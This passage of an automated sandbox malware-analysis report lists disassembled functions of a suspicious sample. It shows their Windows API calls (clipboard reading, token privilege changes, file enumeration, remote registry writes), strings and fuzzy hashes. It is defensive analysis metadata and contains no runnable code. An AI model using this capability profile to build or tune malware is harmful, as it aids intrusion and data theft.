                                          • Part of subcall function 00ED8713: CloseHandle.KERNEL32(?,?,00ED8851), ref: 00ED873A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                        • String ID: $default$winsta0$winsta0\default
                                        • API String ID: 2063423040-1685893292
                                        • Opcode ID: e5a517600e86ffaccafe0fdd76da538a849520071e4100f7d206c6e39b128e1b
                                        • Instruction ID: 87f99a0d29c8ed8d2bf6b74c4e36bb569dcb0faa58535188a741f4b2ee82a304
                                        • Opcode Fuzzy Hash: e5a517600e86ffaccafe0fdd76da538a849520071e4100f7d206c6e39b128e1b
                                        • Instruction Fuzzy Hash: E4814171900209AFDF11DFA4DD45AEEBBB8FF04308F08515AF920BA261DB718E15DB60
                                        Function 00EF425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenClipboard.USER32(00F0F910), ref: 00EF4284
                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00EF4292
                                        • GetClipboardData.USER32(0000000D), ref: 00EF429A
                                        • CloseClipboard.USER32 ref: 00EF42A6
                                        • GlobalLock.KERNEL32(00000000), ref: 00EF42C2
                                        • CloseClipboard.USER32 ref: 00EF42CC
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00EF42E1
                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00EF42EE
                                        • GetClipboardData.USER32(00000001), ref: 00EF42F6
                                        • GlobalLock.KERNEL32(00000000), ref: 00EF4303
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00EF4337
                                        • CloseClipboard.USER32 ref: 00EF4447
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                        • String ID:
                                        • API String ID: 3222323430-0
                                        • Opcode ID: 0373a6f7fa1fdbece47a378b0c81c80a171de3d914d14dbb06b21ae5a32ef7ff
                                        • Instruction ID: b5dc3ed942bb2065ff3e32cea066d7e9e5a714fc40ca34f6f8fb939c96886832
                                        • Opcode Fuzzy Hash: 0373a6f7fa1fdbece47a378b0c81c80a171de3d914d14dbb06b21ae5a32ef7ff
                                        • Instruction Fuzzy Hash: DB519E75204209ABD310FF64DC86F7F77E8BB84B00F105529FA9AE21E1DB70D9099B62
                                        Function 00EEC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00EEC9F8
                                        • FindClose.KERNEL32(00000000), ref: 00EECA4C
                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EECA71
                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EECA88
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EECAAF
                                        • __swprintf.LIBCMT ref: 00EECAFB
                                        • __swprintf.LIBCMT ref: 00EECB3E
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                        • __swprintf.LIBCMT ref: 00EECB92
                                          • Part of subcall function 00EA38D8: __woutput_l.LIBCMT ref: 00EA3931
                                        • __swprintf.LIBCMT ref: 00EECBE0
                                          • Part of subcall function 00EA38D8: __flsbuf.LIBCMT ref: 00EA3953
                                          • Part of subcall function 00EA38D8: __flsbuf.LIBCMT ref: 00EA396B
                                        • __swprintf.LIBCMT ref: 00EECC2F
                                        • __swprintf.LIBCMT ref: 00EECC7E
                                        • __swprintf.LIBCMT ref: 00EECCCD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                        • API String ID: 3953360268-2428617273
                                        • Opcode ID: 18701ff3ec2d65abaa4760f7da346ba09d4df9a98f736048e53eda0575c74f0d
                                        • Instruction ID: 5a4198adccaa6cd97799ed22ede643735c95b484818e36ab1aaedba7bbadb255
                                        • Opcode Fuzzy Hash: 18701ff3ec2d65abaa4760f7da346ba09d4df9a98f736048e53eda0575c74f0d
                                        • Instruction Fuzzy Hash: 0FA15FB2508304ABC714FB64C985DAFB7ECFF94704F441929B58AE6192EB34DA09C762
                                        Function 00EEF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EEF221
                                        • _wcscmp.LIBCMT ref: 00EEF236
                                        • _wcscmp.LIBCMT ref: 00EEF24D
                                        • GetFileAttributesW.KERNEL32(?), ref: 00EEF25F
                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00EEF279
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00EEF291
                                        • FindClose.KERNEL32(00000000), ref: 00EEF29C
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00EEF2B8
                                        • _wcscmp.LIBCMT ref: 00EEF2DF
                                        • _wcscmp.LIBCMT ref: 00EEF2F6
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EEF308
                                        • SetCurrentDirectoryW.KERNEL32(00F3A5A0), ref: 00EEF326
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EEF330
                                        • FindClose.KERNEL32(00000000), ref: 00EEF33D
                                        • FindClose.KERNEL32(00000000), ref: 00EEF34F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                        • String ID: *.*
                                        • API String ID: 1803514871-438819550
                                        • Opcode ID: ecb01c9bd1726afdcaccbc2b539c689a56225ca3e42bb1322a9afacc21bf3f0f
                                        • Instruction ID: 8620b8b08cecb85b6ac0783c1c0ab7fedf78d9d477a69db8037cc0ef1158e1d5
                                        • Opcode Fuzzy Hash: ecb01c9bd1726afdcaccbc2b539c689a56225ca3e42bb1322a9afacc21bf3f0f
                                        • Instruction Fuzzy Hash: 8131E47660025D6ADF20DBB5DC48ADE73ACAF49364F141176F914F30A0EB30DA89DA50
                                        Function 00F00AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F00BDE
                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F0F910,00000000,?,00000000,?,?), ref: 00F00C4C
                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F00C94
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F00D1D
                                        • RegCloseKey.ADVAPI32(?), ref: 00F0103D
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F0104A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Close$ConnectCreateRegistryValue
                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                        • API String ID: 536824911-966354055
                                        • Opcode ID: a81da01c481be3c873b5af4573ded4a021dd0ad07be562b548e33bd405435554
                                        • Instruction ID: 79474e1f3472d7ec7101a038b8b8c6f0edae2421f264be0a9a75d8ab44c81c9b
                                        • Opcode Fuzzy Hash: a81da01c481be3c873b5af4573ded4a021dd0ad07be562b548e33bd405435554
                                        • Instruction Fuzzy Hash: 970260756006119FCB14EF14C895E2AB7E5FF89724F04985DF98AAB3A2CB30ED41DB81
                                        Function 00F0C8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfilenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • DragQueryPoint.SHELL32(?,?), ref: 00F0C917
                                          • Part of subcall function 00F0ADF1: ClientToScreen.USER32(?,?), ref: 00F0AE1A
                                          • Part of subcall function 00F0ADF1: GetWindowRect.USER32(?,?), ref: 00F0AE90
                                          • Part of subcall function 00F0ADF1: PtInRect.USER32(?,?,00F0C304), ref: 00F0AEA0
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00F0C980
                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F0C98B
                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F0C9AE
                                        • _wcscat.LIBCMT ref: 00F0C9DE
                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F0C9F5
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00F0CA0E
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00F0CA25
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00F0CA47
                                        • DragFinish.SHELL32(?), ref: 00F0CA4E
                                        • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00F0CB41
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                        • API String ID: 2166380349-3440237614
                                        • Opcode ID: 374a4a66c9cf33da5e6d34a05e56d593bd7588c79377f4566dd57d217153599a
                                        • Instruction ID: 6f5e36d71243332dfc8b052e1392a87e0342844e8d7fa0d1c10120c2d51a5046
                                        • Opcode Fuzzy Hash: 374a4a66c9cf33da5e6d34a05e56d593bd7588c79377f4566dd57d217153599a
                                        • Instruction Fuzzy Hash: 1D616B71108305AFC711EF64CC85D9BBBE8FF89710F400A1EF599A21A1DB70DA49EB92
                                        Function 00EEF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EEF37E
                                        • _wcscmp.LIBCMT ref: 00EEF393
                                        • _wcscmp.LIBCMT ref: 00EEF3AA
                                          • Part of subcall function 00EE45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00EE45DC
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00EEF3D9
                                        • FindClose.KERNEL32(00000000), ref: 00EEF3E4
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00EEF400
                                        • _wcscmp.LIBCMT ref: 00EEF427
                                        • _wcscmp.LIBCMT ref: 00EEF43E
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EEF450
                                        • SetCurrentDirectoryW.KERNEL32(00F3A5A0), ref: 00EEF46E
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EEF478
                                        • FindClose.KERNEL32(00000000), ref: 00EEF485
                                        • FindClose.KERNEL32(00000000), ref: 00EEF497
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                        • String ID: *.*
                                        • API String ID: 1824444939-438819550
                                        • Opcode ID: a7f3e8003fdc38652d13602ad0ecf627009f941c4c2ad4470129daf110d353b5
                                        • Instruction ID: 02b5f8e9c95f980c31f8b448663fcd1db4df6cba1ea19161d456bd80dd9cf34c
                                        • Opcode Fuzzy Hash: a7f3e8003fdc38652d13602ad0ecf627009f941c4c2ad4470129daf110d353b5
                                        • Instruction Fuzzy Hash: 8531B57250125D6ACB20AB75EC88ADF77ACAF49364F141175F850F30E1E730DA49DA54
                                        Function 00F0C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F0C4EC
                                        • GetFocus.USER32 ref: 00F0C4FC
                                        • GetDlgCtrlID.USER32(00000000), ref: 00F0C507
                                        • _memset.LIBCMT ref: 00F0C632
                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00F0C65D
                                        • GetMenuItemCount.USER32(?), ref: 00F0C67D
                                        • GetMenuItemID.USER32(?,00000000), ref: 00F0C690
                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00F0C6C4
                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00F0C70C
                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F0C744
                                        • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00F0C779
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                        • String ID: 0
                                        • API String ID: 3616455698-4108050209
                                        • Opcode ID: ba55ef540e2693c7c239e067dbddc5de526a21c6e8e6da4f0d991642b440b36b
                                        • Instruction ID: db70fa38e133de0bb1f2ba39c188ee14472b49c1244fe835872005b805ac4c44
                                        • Opcode Fuzzy Hash: ba55ef540e2693c7c239e067dbddc5de526a21c6e8e6da4f0d991642b440b36b
                                        • Instruction Fuzzy Hash: 42818C756083059FD720DF14C884A6BBBE8FB89324F04062DF99997291D771E905FBA2
                                        Function 00ED81F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00ED874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00ED8766
                                          • Part of subcall function 00ED874A: GetLastError.KERNEL32(?,00ED822A,?,?,?), ref: 00ED8770
                                          • Part of subcall function 00ED874A: GetProcessHeap.KERNEL32(00000008,?,?,00ED822A,?,?,?), ref: 00ED877F
                                          • Part of subcall function 00ED874A: RtlAllocateHeap.NTDLL(00000000,?,00ED822A), ref: 00ED8786
                                          • Part of subcall function 00ED874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00ED879D
                                          • Part of subcall function 00ED87E7: GetProcessHeap.KERNEL32(00000008,00ED8240,00000000,00000000,?,00ED8240,?), ref: 00ED87F3
                                          • Part of subcall function 00ED87E7: RtlAllocateHeap.NTDLL(00000000,?,00ED8240), ref: 00ED87FA
                                          • Part of subcall function 00ED87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00ED8240,?), ref: 00ED880B
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00ED825B
                                        • _memset.LIBCMT ref: 00ED8270
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00ED828F
                                        • GetLengthSid.ADVAPI32(?), ref: 00ED82A0
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00ED82DD
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00ED82F9
                                        • GetLengthSid.ADVAPI32(?), ref: 00ED8316
                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00ED8325
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00ED832C
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00ED834D
                                        • CopySid.ADVAPI32(00000000), ref: 00ED8354
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00ED8385
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00ED83AB
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00ED83BF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                        • String ID:
                                        • API String ID: 2347767575-0
                                        • Opcode ID: 0d03c5bc64e9a3d20771a8bda9039763ca42da80b7b790658fbfd8fe2567565f
                                        • Instruction ID: 9414c21bcd9fa2c9b6b5b96aa5e4b06dc1a48678a22cbeddd2bbb7c57143f78a
                                        • Opcode Fuzzy Hash: 0d03c5bc64e9a3d20771a8bda9039763ca42da80b7b790658fbfd8fe2567565f
                                        • Instruction Fuzzy Hash: 4B616971900209EFDF10DFA4DE84AEEBBB9FF04704F04912AF815A7291DB319A16DB60
                                        Function 00E96843 Relevance: 19.6, Strings: 15, Instructions: 874COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa$UCP)$UTF)$UTF16)
                                        • API String ID: 0-3700951917
                                        • Opcode ID: e103ba05184ab4ed89fce4cb5472484271a4b088c0585afc36a2b3acadeff3a4
                                        • Instruction ID: 1db81ab4cd0d43b9d0997f85861f5d7bd71801817620ae5a6c55e9ba25a90b6d
                                        • Opcode Fuzzy Hash: e103ba05184ab4ed89fce4cb5472484271a4b088c0585afc36a2b3acadeff3a4
                                        • Instruction Fuzzy Hash: 54727E71E002199BDF24DF58C8907EEB7B5EF48314F1491ABE859BB390E7709982DB90
                                        Function 00F00665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00F010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F00038,?,?), ref: 00F010BC
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F00737
                                          • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                                          • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F007D6
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F0086E
                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F00AAD
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F00ABA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                        • String ID:
                                        • API String ID: 1240663315-0
                                        • Opcode ID: a4b268423962a7d0ad04adb83238215c03bb6545955605c4dd4b55af925885d5
                                        • Instruction ID: 91dd678b5ce5a73f3ff8a480b5c5aa67c0ca799995472d8f1a92c2b00cead838
                                        • Opcode Fuzzy Hash: a4b268423962a7d0ad04adb83238215c03bb6545955605c4dd4b55af925885d5
